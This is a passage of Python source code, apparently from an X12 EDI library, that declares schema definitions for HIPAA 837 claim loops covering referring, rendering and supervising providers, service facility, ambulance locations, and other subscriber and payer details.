position=1, codes=["1W", "SY"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "PER", Properties( desc="Property and Casualty Patient Contact Information", position="0400", repeat="1", req_sit="S", syntax="P0304 P0506 P0708", ), Element( "PER01", Properties( desc="Contact Function Code", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["IC"], ), ), Element( "PER02", Properties( desc="Name", req_sit="S", data_type=("AN", "1", "60"), position=2, codes=[], ), ), Element( "PER03", Properties( desc="Communication Number Qualifier", req_sit="R", data_type=("ID", "2", "2"), position=3, codes=["TE"], ), ), Element( "PER04", Properties( desc="Communication Number", req_sit="R", data_type=("AN", "1", "256"), position=4, codes=[], ), ), Element( "PER05", Properties( desc="Communication Number Qualifier", req_sit="S", data_type=("ID", "2", "2"), position=5, codes=["EX"], ), ), Element( "PER06", Properties( desc="Communication Number", req_sit="S", data_type=("AN", "1", "256"), position=6, codes=[], ), ), Element( "PER07", Properties( desc="Communication Number Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=7, codes=[], ), ), Element( "PER08", Properties( desc="Communication Number", req_sit="N", data_type=("AN", "1", "256"), position=8, codes=[], ), ), Element( "PER09", Properties( desc="Contact Inquiry Reference", req_sit="N", data_type=("AN", "1", "20"), position=9, codes=[], ), ), ), ) parsed_837_2310A = Loop( "2310A", Properties( desc="Referring Provider Name", looptype="", position="2500", repeat="2", req_sit="S", ), Segment( "NM1", Properties( desc="Referring Provider Name", position="2500", repeat="1", req_sit="R", 
syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["DN", "P3"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="S", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="S", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="S", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="S", data_type=("ID", "1", "2"), position=8, codes=["XX"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="S", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "REF", Properties( desc="Referring Provider Secondary Identification", position="2710", repeat="3", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["0B", "1G", "G2"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", 
"50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), ) parsed_837_2310B = Loop( "2310B", Properties( desc="Rendering Provider Name", looptype="", position="2500", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Rendering Provider Name", position="2500", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["82"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1", "2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="S", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="S", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="S", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="S", data_type=("ID", "1", "2"), position=8, codes=["XX"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="S", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( 
desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "PRV", Properties( desc="Rendering Provider Specialty Information", position="2550", repeat="1", req_sit="S", syntax="P0203", ), Element( "PRV01", Properties( desc="Provider Code", req_sit="R", data_type=("ID", "1", "3"), position=1, codes=["PE"], ), ), Element( "PRV02", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["PXC"], ), ), Element( "PRV03", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "PRV04", Properties( desc="State or Province Code", req_sit="N", data_type=("ID", "2", "2"), position=4, codes=[], ), ), Composite( "C035", Properties( desc="Provider Specialty Information", refdes="", repeat="", req_sit="N", seq="05", ), ), Element( "PRV06", Properties( desc="Provider Organization Code", req_sit="N", data_type=("ID", "3", "3"), position=6, codes=[], ), ), ), Segment( "REF", Properties( desc="Rendering Provider Secondary Identification", position="2710", repeat="4", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["0B", "1G", "G2", "LU"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), ) parsed_837_2310C = Loop( "2310C", Properties( desc="Service Facility Location Name", looptype="", position="2500", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Service Facility Location Name", position="2500", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), 
Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["77"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="S", data_type=("ID", "1", "2"), position=8, codes=["XX"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="S", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "N3", Properties( desc="Service Facility Location Address", position="2650", repeat="1", req_sit="R", syntax="", ), Element( "N301", Properties( desc="Address Information", req_sit="R", data_type=("AN", "1", "55"), position=1, codes=[], ), ), Element( "N302", Properties( desc="Address Information", req_sit="S", data_type=("AN", "1", "55"), position=2, codes=[], ), ), ), Segment( "N4", Properties( desc="Service Facility 
Location City, State, ZIP Code", position="2700", repeat="1", req_sit="R", syntax="E0207 C0605 C0704", ), Element( "N401", Properties( desc="City Name", req_sit="R", data_type=("AN", "2", "30"), position=1, codes=[], ), ), Element( "N402", Properties( desc="State or Province Code", req_sit="S", data_type=("ID", "2", "2"), position=2, codes=[], ), ), Element( "N403", Properties( desc="Postal Code", req_sit="S", data_type=("ID", "3", "15"), position=3, codes=[], ), ), Element( "N404", Properties( desc="Country Code", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "N405", Properties( desc="Location Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=5, codes=[], ), ), Element( "N406", Properties( desc="Location Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "N407", Properties( desc="Country Subdivision Code", req_sit="S", data_type=("ID", "1", "3"), position=7, codes=[], ), ), ), Segment( "REF", Properties( desc="Service Facility Location Secondary Identification", position="2710", repeat="3", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["0B", "G2", "LU"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "PER", Properties( desc="Service Facility Contact Information", position="2750", repeat="1", req_sit="S", syntax="P0304 P0506 P0708", ), Element( "PER01", Properties( desc="Contact Function Code", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["IC"], ), ), Element( "PER02", Properties( desc="Name", req_sit="S", data_type=("AN", 
"1", "60"), position=2, codes=[], ), ), Element( "PER03", Properties( desc="Communication Number Qualifier", req_sit="R", data_type=("ID", "2", "2"), position=3, codes=["TE"], ), ), Element( "PER04", Properties( desc="Communication Number", req_sit="R", data_type=("AN", "1", "256"), position=4, codes=[], ), ), Element( "PER05", Properties( desc="Communication Number Qualifier", req_sit="S", data_type=("ID", "2", "2"), position=5, codes=["EX"], ), ), Element( "PER06", Properties( desc="Communication Number", req_sit="S", data_type=("AN", "1", "256"), position=6, codes=[], ), ), Element( "PER07", Properties( desc="Communication Number Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=7, codes=[], ), ), Element( "PER08", Properties( desc="Communication Number", req_sit="N", data_type=("AN", "1", "256"), position=8, codes=[], ), ), Element( "PER09", Properties( desc="Contact Inquiry Reference", req_sit="N", data_type=("AN", "1", "20"), position=9, codes=[], ), ), ), ) parsed_837_2310D = Loop( "2310D", Properties( desc="Supervising Provider Name", looptype="", position="2500", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Supervising Provider Name", position="2500", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["DQ"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="S", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="S", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), 
position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="S", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="S", data_type=("ID", "1", "2"), position=8, codes=["XX"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="S", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "REF", Properties( desc="Supervising Provider Secondary Identification", position="2710", repeat="4", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["0B", "1G", "G2", "LU"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), ) parsed_837_2310E = Loop( "2310E", Properties( desc="Ambulance Pick-up Location", looptype="", position="2500", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Ambulance Pick-up Location", position="2500", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["PW"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", 
"1", "1"), position=2, codes=["2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=8, codes=[], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="N", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "N3", Properties( desc="Ambulance Pick-up Location Address", position="2650", repeat="1", req_sit="R", syntax="", ), Element( "N301", Properties( desc="Address Information", req_sit="R", data_type=("AN", "1", "55"), position=1, codes=[], ), ), Element( "N302", Properties( desc="Address Information", req_sit="S", data_type=("AN", "1", "55"), position=2, codes=[], ), ), ), Segment( "N4", Properties( desc="Ambulance Pick-up Location City, State, ZIP Code", position="2700", repeat="1", req_sit="R", syntax="E0207 C0605 C0704", ), Element( "N401", Properties( desc="City Name", req_sit="R", data_type=("AN", "2", "30"), position=1, codes=[], ), ), Element( 
"N402", Properties( desc="State or Province Code", req_sit="S", data_type=("ID", "2", "2"), position=2, codes=[], ), ), Element( "N403", Properties( desc="Postal Code", req_sit="S", data_type=("ID", "3", "15"), position=3, codes=[], ), ), Element( "N404", Properties( desc="Country Code", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "N405", Properties( desc="Location Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=5, codes=[], ), ), Element( "N406", Properties( desc="Location Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "N407", Properties( desc="Country Subdivision Code", req_sit="S", data_type=("ID", "1", "3"), position=7, codes=[], ), ), ), ) parsed_837_2310F = Loop( "2310F", Properties( desc="Ambulance Drop-off Location", looptype="", position="2500", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Ambulance Drop-off Location", position="2500", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["45"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="S", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="N", 
data_type=("ID", "1", "2"), position=8, codes=[], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="N", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "N3", Properties( desc="Ambulance Drop-off Location Address", position="2650", repeat="1", req_sit="R", syntax="", ), Element( "N301", Properties( desc="Address Information", req_sit="R", data_type=("AN", "1", "55"), position=1, codes=[], ), ), Element( "N302", Properties( desc="Address Information", req_sit="S", data_type=("AN", "1", "55"), position=2, codes=[], ), ), ), Segment( "N4", Properties( desc="Ambulance Drop-off Location City, State, ZIP Code", position="2700", repeat="1", req_sit="R", syntax="E0207 C0605 C0704", ), Element( "N401", Properties( desc="City Name", req_sit="R", data_type=("AN", "2", "30"), position=1, codes=[], ), ), Element( "N402", Properties( desc="State or Province Code", req_sit="S", data_type=("ID", "2", "2"), position=2, codes=[], ), ), Element( "N403", Properties( desc="Postal Code", req_sit="S", data_type=("ID", "3", "15"), position=3, codes=[], ), ), Element( "N404", Properties( desc="Country Code", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "N405", Properties( desc="Location Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=5, codes=[], ), ), Element( "N406", Properties( desc="Location Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "N407", Properties( desc="Country Subdivision Code", req_sit="S", data_type=("ID", "1", "3"), position=7, codes=[], ), ), 
), ) parsed_837_2330A = Loop( "2330A", Properties( desc="Other Subscriber Name", looptype="", position="3250", repeat="1", req_sit="R", ), Segment( "NM1", Properties( desc="Other Subscriber Name", position="3250", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["IL"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1", "2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="S", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="S", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="S", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="R", data_type=("ID", "1", "2"), position=8, codes=["II", "MI"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="R", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "N3", Properties( desc="Other Subscriber Address", position="3320", repeat="1", req_sit="S", syntax="", ), Element( "N301", Properties( desc="Address 
Information", req_sit="R", data_type=("AN", "1", "55"), position=1, codes=[], ), ), Element( "N302", Properties( desc="Address Information", req_sit="S", data_type=("AN", "1", "55"), position=2, codes=[], ), ), ), Segment( "N4", Properties( desc="Other Subscriber City, State, ZIP Code", position="3400", repeat="1", req_sit="S", syntax="E0207 C0605 C0704", ), Element( "N401", Properties( desc="City Name", req_sit="R", data_type=("AN", "2", "30"), position=1, codes=[], ), ), Element( "N402", Properties( desc="State or Province Code", req_sit="S", data_type=("ID", "2", "2"), position=2, codes=[], ), ), Element( "N403", Properties( desc="Postal Code", req_sit="S", data_type=("ID", "3", "15"), position=3, codes=[], ), ), Element( "N404", Properties( desc="Country Code", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "N405", Properties( desc="Location Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=5, codes=[], ), ), Element( "N406", Properties( desc="Location Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "N407", Properties( desc="Country Subdivision Code", req_sit="S", data_type=("ID", "1", "3"), position=7, codes=[], ), ), ), Segment( "REF", Properties( desc="Other Subscriber Secondary Identification", position="3550", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["SY"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), ) parsed_837_2330B = Loop( "2330B", Properties( desc="Other Payer Name", looptype="", position="3250", repeat="1", 
req_sit="R" ), Segment( "NM1", Properties( desc="Other Payer Name", position="3250", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["PR"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="R", data_type=("ID", "1", "2"), position=8, codes=["PI", "XV"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="R", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "N3", Properties( desc="Other Payer Address", position="3320", repeat="1", req_sit="S", syntax="", ), Element( "N301", Properties( desc="Address Information", req_sit="R", data_type=("AN", "1", "55"), position=1, codes=[], ), ), Element( "N302", Properties( desc="Address 
Information", req_sit="S", data_type=("AN", "1", "55"), position=2, codes=[], ), ), ), Segment( "N4", Properties( desc="Other Payer City, State, ZIP Code", position="3400", repeat="1", req_sit="S", syntax="E0207 C0605 C0704", ), Element( "N401", Properties( desc="City Name", req_sit="R", data_type=("AN", "2", "30"), position=1, codes=[], ), ), Element( "N402", Properties( desc="State or Province Code", req_sit="S", data_type=("ID", "2", "2"), position=2, codes=[], ), ), Element( "N403", Properties( desc="Postal Code", req_sit="S", data_type=("ID", "3", "15"), position=3, codes=[], ), ), Element( "N404", Properties( desc="Country Code", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "N405", Properties( desc="Location Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=5, codes=[], ), ), Element( "N406", Properties( desc="Location Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "N407", Properties( desc="Country Subdivision Code", req_sit="S", data_type=("ID", "1", "3"), position=7, codes=[], ), ), ), Segment( "DTP", Properties( desc="Claim Check or Remittance Date", position="3450", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["573"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "REF", Properties( desc="Other Payer Secondary Identifier", position="3550", repeat="2", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["2U", "EI", "FY", "NF"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", 
data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Other Payer Prior Authorization Number", position="3550", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["G1"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Other Payer Referral Number", position="3550", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["9F"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Other Payer Claim Adjustment Indicator", position="3550", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["T4"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( 
"REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Other Payer Claim Control Number", position="3550", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["F8"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), ) parsed_837_2330C = Loop( "2330C", Properties( desc="Other Payer Referring Provider", looptype="", position="3250", repeat="2", req_sit="S", ), Segment( "NM1", Properties( desc="Other Payer Referring Provider", position="3250", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["DN", "P3"], 